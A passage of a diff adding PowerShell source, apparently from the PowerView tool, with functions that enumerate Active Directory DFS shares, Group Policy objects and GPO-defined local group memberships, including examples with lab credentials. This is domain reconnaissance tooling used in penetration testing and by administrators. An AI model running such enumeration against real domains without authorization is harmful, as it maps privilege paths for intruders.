$dfs_pkt_properties = @{ + 'Name' = $blob_name + 'Prefix' = $prefix + 'TargetList' = $target_list + } + $object_list += New-Object -TypeName PSObject -Property $dfs_pkt_properties + $prefix = $Null + $blob_name = $Null + $target_list = $Null + } + + $servers = @() + $object_list | ForEach-Object { + if ($_.TargetList) { + $_.TargetList | ForEach-Object { + $servers += $_.split('\')[2] + } + } + } + + $servers + } + + function Get-DomainDFSShareV1 { + [CmdletBinding()] + Param( + [String] + $Domain, + + [String] + $SearchBase, + + [String] + $Server, + + [String] + $SearchScope = 'Subtree', + + [Int] + $ResultPageSize = 200, + + [Int] + $ServerTimeLimit, + + [Switch] + $Tombstone, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + $DFSsearcher = Get-DomainSearcher @PSBoundParameters + + if ($DFSsearcher) { + $DFSshares = @() + $DFSsearcher.filter = '(&(objectClass=fTDfs))' + + try { + $Results = $DFSSearcher.FindAll() + $Results | Where-Object {$_} | ForEach-Object { + $Properties = $_.Properties + $RemoteNames = $Properties.remoteservername + $Pkt = $Properties.pkt + + $DFSshares += $RemoteNames | ForEach-Object { + try { + if ( $_.Contains('\') ) { + New-Object -TypeName PSObject -Property @{'Name'=$Properties.name[0];'RemoteServerName'=$_.split('\')[2]} + } + } + catch { + Write-Verbose "[Get-DomainDFSShare] Get-DomainDFSShareV1 error in parsing DFS share : $_" + } + } + } + if ($Results) { + try { $Results.dispose() } + catch { + Write-Verbose "[Get-DomainDFSShare] Get-DomainDFSShareV1 error disposing of the Results object: $_" + } + } + $DFSSearcher.dispose() + + if ($pkt -and $pkt[0]) { + Parse-Pkt $pkt[0] | ForEach-Object { + # If a folder doesn't have a redirection it will have a target like + # \\null\TestNameSpace\folder\.DFSFolderLink so we do actually want to match + # on 'null' rather than $Null + if ($_ -ne 'null') { + New-Object -TypeName PSObject -Property @{'Name'=$Properties.name[0];'RemoteServerName'=$_} + } + } + } + } + catch { + Write-Warning "[Get-DomainDFSShare] Get-DomainDFSShareV1 error : $_" + } + $DFSshares | Sort-Object -Unique -Property 'RemoteServerName' + } + } + + function Get-DomainDFSShareV2 { + [CmdletBinding()] + Param( + [String] + $Domain, + + [String] + $SearchBase, + + [String] + $Server, + + [String] + $SearchScope = 'Subtree', + + [Int] + $ResultPageSize = 200, + + [Int] + $ServerTimeLimit, + + [Switch] + $Tombstone, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + $DFSsearcher = Get-DomainSearcher @PSBoundParameters + + if ($DFSsearcher) { + $DFSshares = @() + $DFSsearcher.filter = '(&(objectClass=msDFS-Linkv2))' + $Null = $DFSSearcher.PropertiesToLoad.AddRange(('msdfs-linkpathv2','msDFS-TargetListv2')) + + try { + $Results = $DFSSearcher.FindAll() + $Results | Where-Object {$_} | ForEach-Object { + $Properties = $_.Properties + $target_list = $Properties.'msdfs-targetlistv2'[0] + $xml = [xml][System.Text.Encoding]::Unicode.GetString($target_list[2..($target_list.Length-1)]) + $DFSshares += $xml.targets.ChildNodes | ForEach-Object { + try { + $Target = $_.InnerText + if ( $Target.Contains('\') ) { + $DFSroot = $Target.split('\')[3] + $ShareName = $Properties.'msdfs-linkpathv2'[0] + New-Object -TypeName PSObject -Property @{'Name'="$DFSroot$ShareName";'RemoteServerName'=$Target.split('\')[2]} + } + } + catch { + Write-Verbose "[Get-DomainDFSShare] Get-DomainDFSShareV2 error in parsing target : $_" + } + } + } + if ($Results) { + try { $Results.dispose() } + catch { + Write-Verbose "[Get-DomainDFSShare] Error disposing of the Results object: $_" + } + } + $DFSSearcher.dispose() + } + catch { + Write-Warning "[Get-DomainDFSShare] Get-DomainDFSShareV2 error : $_" + } + $DFSshares | Sort-Object -Unique -Property 'RemoteServerName' + } + } + } + + PROCESS { + $DFSshares = @() + + if ($PSBoundParameters['Domain']) { + ForEach ($TargetDomain in $Domain) { + $SearcherArguments['Domain'] = $TargetDomain + if ($Version -match 'all|1') { + $DFSshares += Get-DomainDFSShareV1 @SearcherArguments + } + if ($Version -match 'all|2') { + $DFSshares += Get-DomainDFSShareV2 @SearcherArguments + } + } + } + else { + if ($Version -match 'all|1') { + $DFSshares += Get-DomainDFSShareV1 @SearcherArguments + } + if ($Version -match 'all|2') { + $DFSshares += Get-DomainDFSShareV2 @SearcherArguments + } + } + + $DFSshares | Sort-Object -Property ('RemoteServerName','Name') -Unique + } +} + + +######################################################## +# +# GPO related functions. +# +######################################################## + +function Get-GptTmpl { +<# +.SYNOPSIS + +Helper to parse a GptTmpl.inf policy file path into a hashtable. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Add-RemoteConnection, Remove-RemoteConnection, Get-IniContent + +.DESCRIPTION + +Parses a GptTmpl.inf into a custom hashtable using Get-IniContent. If a +GPO object is passed, GPOPATH\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf +is constructed and assumed to be the parse target. If -Credential is passed, +Add-RemoteConnection is used to mount \\TARGET\SYSVOL with the specified creds, +the files are parsed, and the connection is destroyed later with Remove-RemoteConnection. + +.PARAMETER GptTmplPath + +Specifies the GptTmpl.inf file path name to parse. + +.PARAMETER OutputObject + +Switch. Output a custom PSObject instead of a hashtable. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the remote system. + +.EXAMPLE + +Get-GptTmpl -GptTmplPath "\\dev.testlab.local\sysvol\dev.testlab.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf" + +Parse the default domain policy .inf for dev.testlab.local + +.EXAMPLE + +Get-DomainGPO testing | Get-GptTmpl + +Parse the GptTmpl.inf policy for the GPO with display name of 'testing'. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-GptTmpl -Credential $Cred -GptTmplPath "\\dev.testlab.local\sysvol\dev.testlab.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf" + +Parse the default domain policy .inf for dev.testlab.local using alternate credentials. + +.OUTPUTS + +Hashtable + +Ouputs a hashtable representing the parsed GptTmpl.inf file. +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType([Hashtable])] + [CmdletBinding()] + Param ( + [Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('gpcfilesyspath', 'Path')] + [String] + $GptTmplPath, + + [Switch] + $OutputObject, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + BEGIN { + $MappedPaths = @{} + } + + PROCESS { + try { + if (($GptTmplPath -Match '\\\\.*\\.*') -and ($PSBoundParameters['Credential'])) { + $SysVolPath = "\\$((New-Object System.Uri($GptTmplPath)).Host)\SYSVOL" + if (-not $MappedPaths[$SysVolPath]) { + # map IPC$ to this computer if it's not already + Add-RemoteConnection -Path $SysVolPath -Credential $Credential + $MappedPaths[$SysVolPath] = $True + } + } + + $TargetGptTmplPath = $GptTmplPath + if (-not $TargetGptTmplPath.EndsWith('.inf')) { + $TargetGptTmplPath += '\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf' + } + + Write-Verbose "[Get-GptTmpl] Parsing GptTmplPath: $TargetGptTmplPath" + + if ($PSBoundParameters['OutputObject']) { + $Contents = Get-IniContent -Path $TargetGptTmplPath -OutputObject -ErrorAction Stop + if ($Contents) { + $Contents | Add-Member Noteproperty 'Path' $TargetGptTmplPath + $Contents + } + } + else { + $Contents = Get-IniContent -Path $TargetGptTmplPath -ErrorAction Stop + if ($Contents) { + $Contents['Path'] = $TargetGptTmplPath + $Contents + } + } + } + catch { + Write-Verbose "[Get-GptTmpl] Error parsing $TargetGptTmplPath : $_" + } + } + + END { + # remove the SYSVOL mappings + $MappedPaths.Keys | ForEach-Object { Remove-RemoteConnection -Path $_ } + } +} + + +function Get-GroupsXML { +<# +.SYNOPSIS + +Helper to parse a groups.xml file path into a custom object. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Add-RemoteConnection, Remove-RemoteConnection, ConvertTo-SID + +.DESCRIPTION + +Parses a groups.xml into a custom object. If -Credential is passed, +Add-RemoteConnection is used to mount \\TARGET\SYSVOL with the specified creds, +the files are parsed, and the connection is destroyed later with Remove-RemoteConnection. + +.PARAMETER GroupsXMLpath + +Specifies the groups.xml file path name to parse. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the remote system. + +.OUTPUTS + +PowerView.GroupsXML +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.GroupsXML')] + [CmdletBinding()] + Param ( + [Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('Path')] + [String] + $GroupsXMLPath, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + BEGIN { + $MappedPaths = @{} + } + + PROCESS { + try { + if (($GroupsXMLPath -Match '\\\\.*\\.*') -and ($PSBoundParameters['Credential'])) { + $SysVolPath = "\\$((New-Object System.Uri($GroupsXMLPath)).Host)\SYSVOL" + if (-not $MappedPaths[$SysVolPath]) { + # map IPC$ to this computer if it's not already + Add-RemoteConnection -Path $SysVolPath -Credential $Credential + $MappedPaths[$SysVolPath] = $True + } + } + + [XML]$GroupsXMLcontent = Get-Content -Path $GroupsXMLPath -ErrorAction Stop + + # process all group properties in the XML + $GroupsXMLcontent | Select-Xml "/Groups/Group" | Select-Object -ExpandProperty node | ForEach-Object { + + $Groupname = $_.Properties.groupName + + # extract the localgroup sid for memberof + $GroupSID = $_.Properties.groupSid + if (-not $GroupSID) { + if ($Groupname -match 'Administrators') { + $GroupSID = 'S-1-5-32-544' + } + elseif ($Groupname -match 'Remote Desktop') { + $GroupSID = 'S-1-5-32-555' + } + elseif ($Groupname -match 'Guests') { + $GroupSID = 'S-1-5-32-546' + } + else { + if ($PSBoundParameters['Credential']) { + $GroupSID = ConvertTo-SID -ObjectName $Groupname -Credential $Credential + } + else { + $GroupSID = ConvertTo-SID -ObjectName $Groupname + } + } + } + + # extract out members added to this group + $Members = $_.Properties.members | Select-Object -ExpandProperty Member | Where-Object { $_.action -match 'ADD' } | ForEach-Object { + if ($_.sid) { $_.sid } + else { $_.name } + } + + if ($Members) { + # extract out any/all filters...I hate you GPP + if ($_.filters) { + $Filters = $_.filters.GetEnumerator() | ForEach-Object { + New-Object -TypeName PSObject -Property @{'Type' = $_.LocalName;'Value' = $_.name} + } + } + else { + $Filters = $Null + } + + if ($Members -isnot [System.Array]) { $Members = @($Members) } + + $GroupsXML = New-Object PSObject + $GroupsXML | Add-Member Noteproperty 'GPOPath' $TargetGroupsXMLPath + $GroupsXML | Add-Member Noteproperty 'Filters' $Filters + $GroupsXML | Add-Member Noteproperty 'GroupName' $GroupName + $GroupsXML | Add-Member Noteproperty 'GroupSID' $GroupSID + $GroupsXML | Add-Member Noteproperty 'GroupMemberOf' $Null + $GroupsXML | Add-Member Noteproperty 'GroupMembers' $Members + $GroupsXML.PSObject.TypeNames.Insert(0, 'PowerView.GroupsXML') + $GroupsXML + } + } + } + catch { + Write-Verbose "[Get-GroupsXML] Error parsing $TargetGroupsXMLPath : $_" + } + } + + END { + # remove the SYSVOL mappings + $MappedPaths.Keys | ForEach-Object { Remove-RemoteConnection -Path $_ } + } +} + + +function Get-DomainGPO { +<# +.SYNOPSIS + +Return all GPOs or specific GPO objects in AD. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Get-DomainComputer, Get-DomainUser, Get-DomainOU, Get-NetComputerSiteName, Get-DomainSite, Get-DomainObject, Convert-LDAPProperty + +.DESCRIPTION + +Builds a directory searcher object using Get-DomainSearcher, builds a custom +LDAP filter based on targeting/filter parameters, and searches for all objects +matching the criteria. To only return specific properties, use +"-Properties samaccountname,usnchanged,...". By default, all GPO objects for +the current domain are returned. To enumerate all GPOs that are applied to +a particular machine, use -ComputerName X. + +.PARAMETER Identity + +A display name (e.g. 'Test GPO'), DistinguishedName (e.g. 'CN={F260B76D-55C8-46C5-BEF1-9016DD98E272},CN=Policies,CN=System,DC=testlab,DC=local'), +GUID (e.g. '10ec320d-3111-4ef4-8faf-8f14f4adc789'), or GPO name (e.g. '{F260B76D-55C8-46C5-BEF1-9016DD98E272}'). Wildcards accepted. + +.PARAMETER ComputerIdentity + +Return all GPO objects applied to a given computer identity (name, dnsname, DistinguishedName, etc.). + +.PARAMETER UserIdentity + +Return all GPO objects applied to a given user identity (name, SID, DistinguishedName, etc.). + +.PARAMETER Domain + +Specifies the domain to use for the query, defaults to the current domain. + +.PARAMETER LDAPFilter + +Specifies an LDAP query string that is used to filter Active Directory objects. + +.PARAMETER Properties + +Specifies the properties of the output object to retrieve from the server. + +.PARAMETER SearchBase + +The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER SecurityMasks + +Specifies an option for examining security information of a directory object. +One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER FindOne + +Only return one result object. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.PARAMETER Raw + +Switch. Return raw results instead of translating the fields into a custom PSObject. + +.EXAMPLE + +Get-DomainGPO -Domain testlab.local + +Return all GPOs for the testlab.local domain + +.EXAMPLE + +Get-DomainGPO -ComputerName windows1.testlab.local + +Returns all GPOs applied windows1.testlab.local + +.EXAMPLE + +"{F260B76D-55C8-46C5-BEF1-9016DD98E272}","Test GPO" | Get-DomainGPO + +Return the GPOs with the name of "{F260B76D-55C8-46C5-BEF1-9016DD98E272}" and the display +name of "Test GPO" + +.EXAMPLE + +Get-DomainGPO -LDAPFilter '(!primarygroupid=513)' -Properties samaccountname,lastlogon + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainGPO -Credential $Cred + +.OUTPUTS + +PowerView.GPO + +Custom PSObject with translated GPO property fields. + +PowerView.GPO.Raw + +The raw DirectoryServices.SearchResult object, if -Raw is enabled. +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')] + [OutputType('PowerView.GPO')] + [OutputType('PowerView.GPO.Raw')] + [CmdletBinding(DefaultParameterSetName = 'None')] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('DistinguishedName', 'SamAccountName', 'Name')] + [String[]] + $Identity, + + [Parameter(ParameterSetName = 'ComputerIdentity')] + [Alias('ComputerName')] + [ValidateNotNullOrEmpty()] + [String] + $ComputerIdentity, + + [Parameter(ParameterSetName = 'UserIdentity')] + [Alias('UserName')] + [ValidateNotNullOrEmpty()] + [String] + $UserIdentity, + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [ValidateNotNullOrEmpty()] + [Alias('Filter')] + [String] + $LDAPFilter, + + [ValidateNotNullOrEmpty()] + [String[]] + $Properties, + + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] + [String] + $SearchBase, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')] + [String] + $SecurityMasks, + + [Switch] + $Tombstone, + + [Alias('ReturnOne')] + [Switch] + $FindOne, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty, + + [Switch] + $Raw + ) + + BEGIN { + $SearcherArguments = @{} + if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties } + if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase } + if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks } + if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } + $GPOSearcher = Get-DomainSearcher @SearcherArguments + } + + PROCESS { + if ($GPOSearcher) { + if ($PSBoundParameters['ComputerIdentity'] -or $PSBoundParameters['UserIdentity']) { + $GPOAdsPaths = @() + if ($SearcherArguments['Properties']) { + $OldProperties = $SearcherArguments['Properties'] + } + $SearcherArguments['Properties'] = 'distinguishedname,dnshostname' + $TargetComputerName = $Null + + if ($PSBoundParameters['ComputerIdentity']) { + $SearcherArguments['Identity'] = $ComputerIdentity + $Computer = Get-DomainComputer @SearcherArguments -FindOne | Select-Object -First 1 + if(-not $Computer) { + Write-Verbose "[Get-DomainGPO] Computer '$ComputerIdentity' not found!" + } + $ObjectDN = $Computer.distinguishedname + $TargetComputerName = $Computer.dnshostname + } + else { + $SearcherArguments['Identity'] = $UserIdentity + $User = Get-DomainUser @SearcherArguments -FindOne | Select-Object -First 1 + if(-not $User) { + Write-Verbose "[Get-DomainGPO] User '$UserIdentity' not found!" + } + $ObjectDN = $User.distinguishedname + } + + # extract all OUs the target user/computer is a part of + $ObjectOUs = @() + $ObjectOUs += $ObjectDN.split(',') | ForEach-Object { + if($_.startswith('OU=')) { + $ObjectDN.SubString($ObjectDN.IndexOf("$($_),")) + } + } + Write-Verbose "[Get-DomainGPO] object OUs: $ObjectOUs" + + if ($ObjectOUs) { + # find all the GPOs linked to the user/computer's OUs + $SearcherArguments.Remove('Properties') + $InheritanceDisabled = $False + ForEach($ObjectOU in $ObjectOUs) { + $SearcherArguments['Identity'] = $ObjectOU + $GPOAdsPaths += Get-DomainOU @SearcherArguments | ForEach-Object { + # extract any GPO links for this particular OU the computer is a part of + if ($_.gplink) { + $_.gplink.split('][') | ForEach-Object { + if ($_.startswith('LDAP')) { + $Parts = $_.split(';') + $GpoDN = $Parts[0] + $Enforced = $Parts[1] + + if ($InheritanceDisabled) { + # if inheritance has already been disabled and this GPO is set as "enforced" + # then add it, otherwise ignore it + if ($Enforced -eq 2) { + $GpoDN + } + } + else { + # inheritance not marked as disabled yet + $GpoDN + } + } + } + } + + # if this OU has GPO inheritence disabled, break so additional OUs aren't processed + if ($_.gpoptions -eq 1) { + $InheritanceDisabled = $True + } + } + } + } + + if ($TargetComputerName) { + # find all the GPOs linked to the computer's site + $ComputerSite = (Get-NetComputerSiteName -ComputerName $TargetComputerName).SiteName + if($ComputerSite -and ($ComputerSite -notlike 'Error*')) { + $SearcherArguments['Identity'] = $ComputerSite + $GPOAdsPaths += Get-DomainSite @SearcherArguments | ForEach-Object { + if($_.gplink) { + # extract any GPO links for this particular site the computer is a part of + $_.gplink.split('][') | ForEach-Object { + if ($_.startswith('LDAP')) { + $_.split(';')[0] + } + } + } + } + } + } + + # find any GPOs linked to the user/computer's domain + $ObjectDomainDN = $ObjectDN.SubString($ObjectDN.IndexOf('DC=')) + $SearcherArguments.Remove('Identity') + $SearcherArguments.Remove('Properties') + $SearcherArguments['LDAPFilter'] = "(objectclass=domain)(distinguishedname=$ObjectDomainDN)" + $GPOAdsPaths += Get-DomainObject @SearcherArguments | ForEach-Object { + if($_.gplink) { + # extract any GPO links for this particular domain the computer is a part of + $_.gplink.split('][') | ForEach-Object { + if ($_.startswith('LDAP')) { + $_.split(';')[0] + } + } + } + } + Write-Verbose "[Get-DomainGPO] GPOAdsPaths: $GPOAdsPaths" + + # restore the old properites to return, if set + if ($OldProperties) { $SearcherArguments['Properties'] = $OldProperties } + else { $SearcherArguments.Remove('Properties') } + $SearcherArguments.Remove('Identity') + + $GPOAdsPaths | Where-Object {$_ -and ($_ -ne '')} | ForEach-Object { + # use the gplink as an ADS path to enumerate all GPOs for the computer + $SearcherArguments['SearchBase'] = $_ + $SearcherArguments['LDAPFilter'] = "(objectCategory=groupPolicyContainer)" + Get-DomainObject @SearcherArguments | ForEach-Object { + if ($PSBoundParameters['Raw']) { + $_.PSObject.TypeNames.Insert(0, 'PowerView.GPO.Raw') + } + else { + $_.PSObject.TypeNames.Insert(0, 'PowerView.GPO') + } + $_ + } + } + } + else { + $IdentityFilter = '' + $Filter = '' + $Identity | Where-Object {$_} | ForEach-Object { + $IdentityInstance = $_.Replace('(', '\28').Replace(')', '\29') + if ($IdentityInstance -match 'LDAP://|^CN=.*') { + $IdentityFilter += "(distinguishedname=$IdentityInstance)" + if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) { + # if a -Domain isn't explicitly set, extract the object domain out of the distinguishedname + # and rebuild the domain searcher + $IdentityDomain = $IdentityInstance.SubString($IdentityInstance.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' + Write-Verbose "[Get-DomainGPO] Extracted domain '$IdentityDomain' from '$IdentityInstance'" + $SearcherArguments['Domain'] = $IdentityDomain + $GPOSearcher = Get-DomainSearcher @SearcherArguments + if (-not $GPOSearcher) { + Write-Warning "[Get-DomainGPO] Unable to retrieve domain searcher for '$IdentityDomain'" + } + } + } + elseif ($IdentityInstance -match '{.*}') { + $IdentityFilter += "(name=$IdentityInstance)" + } + else { + try { + $GuidByteString = (-Join (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object {$_.ToString('X').PadLeft(2,'0')})) -Replace '(..)','\$1' + $IdentityFilter += "(objectguid=$GuidByteString)" + } + catch { + $IdentityFilter += "(displayname=$IdentityInstance)" + } + } + } + if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) { + $Filter += "(|$IdentityFilter)" + } + + if ($PSBoundParameters['LDAPFilter']) { + Write-Verbose "[Get-DomainGPO] Using additional LDAP filter: $LDAPFilter" + $Filter += "$LDAPFilter" + } + + $GPOSearcher.filter = "(&(objectCategory=groupPolicyContainer)$Filter)" + Write-Verbose "[Get-DomainGPO] filter string: $($GPOSearcher.filter)" + + if ($PSBoundParameters['FindOne']) { $Results = $GPOSearcher.FindOne() } + else { $Results = $GPOSearcher.FindAll() } + $Results | Where-Object {$_} | ForEach-Object { + if ($PSBoundParameters['Raw']) { + # return raw result objects + $GPO = $_ + $GPO.PSObject.TypeNames.Insert(0, 'PowerView.GPO.Raw') + } + else { + if ($PSBoundParameters['SearchBase'] -and ($SearchBase -Match '^GC://')) { + $GPO = Convert-LDAPProperty -Properties $_.Properties + try { + $GPODN = $GPO.distinguishedname + $GPODomain = $GPODN.SubString($GPODN.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' + $gpcfilesyspath = "\\$GPODomain\SysVol\$GPODomain\Policies\$($GPO.cn)" + $GPO | Add-Member Noteproperty 'gpcfilesyspath' $gpcfilesyspath + } + catch { + Write-Verbose "[Get-DomainGPO] Error calculating gpcfilesyspath for: $($GPO.distinguishedname)" + } + } + else { + $GPO = Convert-LDAPProperty -Properties $_.Properties + } + $GPO.PSObject.TypeNames.Insert(0, 'PowerView.GPO') + } + $GPO + } + if ($Results) { + try { $Results.dispose() } + catch { + Write-Verbose "[Get-DomainGPO] Error disposing of the Results object: $_" + } + } + $GPOSearcher.dispose() + } + } + } +} + + +function Get-DomainGPOLocalGroup { +<# +.SYNOPSIS + +Returns all GPOs in a domain that modify local group memberships through 'Restricted Groups' +or Group Policy preferences. Also return their user membership mappings, if they exist. + +Author: @harmj0y +License: BSD 3-Clause +Required Dependencies: Get-DomainGPO, Get-GptTmpl, Get-GroupsXML, ConvertTo-SID, ConvertFrom-SID + +.DESCRIPTION + +First enumerates all GPOs in the current/target domain using Get-DomainGPO with passed +arguments, and for each GPO checks if 'Restricted Groups' are set with GptTmpl.inf or +group membership is set through Group Policy Preferences groups.xml files. For any +GptTmpl.inf files found, the file is parsed with Get-GptTmpl and any 'Group Membership' +section data is processed if present. Any found Groups.xml files are parsed with +Get-GroupsXML and those memberships are returned as well. + +.PARAMETER Identity + +A display name (e.g. 'Test GPO'), DistinguishedName (e.g. 'CN={F260B76D-55C8-46C5-BEF1-9016DD98E272},CN=Policies,CN=System,DC=testlab,DC=local'), +GUID (e.g. '10ec320d-3111-4ef4-8faf-8f14f4adc789'), or GPO name (e.g. '{F260B76D-55C8-46C5-BEF1-9016DD98E272}'). Wildcards accepted. + +.PARAMETER ResolveMembersToSIDs + +Switch. Indicates that any member names should be resolved to their domain SIDs. + +.PARAMETER Domain + +Specifies the domain to use for the query, defaults to the current domain. + +.PARAMETER LDAPFilter + +Specifies an LDAP query string that is used to filter Active Directory objects. + +.PARAMETER SearchBase + +The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +Get-DomainGPOLocalGroup + +Returns all local groups set by GPO along with their members and memberof. + +.EXAMPLE + +Get-DomainGPOLocalGroup -ResolveMembersToSIDs + +Returns all local groups set by GPO along with their members and memberof, +and resolve any members to their domain SIDs. + +.EXAMPLE + +'{0847C615-6C4E-4D45-A064-6001040CC21C}' | Get-DomainGPOLocalGroup + +Return any GPO-set groups for the GPO with the given name/GUID. + +.EXAMPLE + +Get-DomainGPOLocalGroup 'Desktops' + +Return any GPO-set groups for the GPO with the given display name. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainGPOLocalGroup -Credential $Cred + +.LINK + +https://morgansimonsenblog.azurewebsites.net/tag/groups/ +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.GPOGroup')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('DistinguishedName', 'SamAccountName', 'Name')] + [String[]] + $Identity, + + [Switch] + $ResolveMembersToSIDs, + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [ValidateNotNullOrEmpty()] + [Alias('Filter')] + [String] + $LDAPFilter, + + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] + [String] + $SearchBase, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [Switch] + $Tombstone, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + BEGIN { + $SearcherArguments = @{} + if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['LDAPFilter']) { $SearcherArguments['LDAPFilter'] = $Domain } + if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase } + if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } + + $ConvertArguments = @{} + if ($PSBoundParameters['Domain']) { $ConvertArguments['Domain'] = $Domain } + if ($PSBoundParameters['Server']) { $ConvertArguments['Server'] = $Server } + if ($PSBoundParameters['Credential']) { $ConvertArguments['Credential'] = $Credential } + + $SplitOption = [System.StringSplitOptions]::RemoveEmptyEntries + } + + PROCESS { + if 